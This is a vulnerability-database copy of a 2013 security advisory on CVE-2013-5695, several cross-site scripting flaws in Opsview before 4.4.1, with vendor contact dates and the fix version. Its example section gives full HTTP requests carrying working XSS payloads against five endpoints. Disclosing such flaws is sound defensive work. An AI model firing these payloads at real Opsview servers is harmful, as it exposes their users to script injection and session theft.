Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30109
HistoryDec 09, 2013 - 12:00 a.m.

CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View

2013-12-0900:00:00
vulners.com
20
JSON

CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)

I. ADVISORY

Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04

II. BACKGROUND

Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here

http://www.opsview.com/about-us

II. DESCRIPTION

Opsview is vulnerable to a few different XSS based attacks.

/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/

There are a variety of iterations within those functions
which may allow a malicious user to trigger a cross site
scripting attack.

III. EXAMPLE

GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no

POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

&from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit

GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

III SOLUTION

Opsview released a fix with Opsview 4.4.1
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

– =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF

Related

packetstorm 1
cve 1
prion 1
securityvulns 1
packetstorm
packetstorm
Ops View Pre 4.4.1 Cross Site Scripting
2013-10-28 00:00:00
cve
cve
CVE-2013-5695
2013-11-05 20:55:00
prion
prion
Cross site scripting
2013-11-05 20:55:00
securityvulns
securityvulns
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2013-12-09 00:00:00
JSON
Related for SECURITYVULNS:DOC:30109
packetstorm1cve1prion1securityvulns1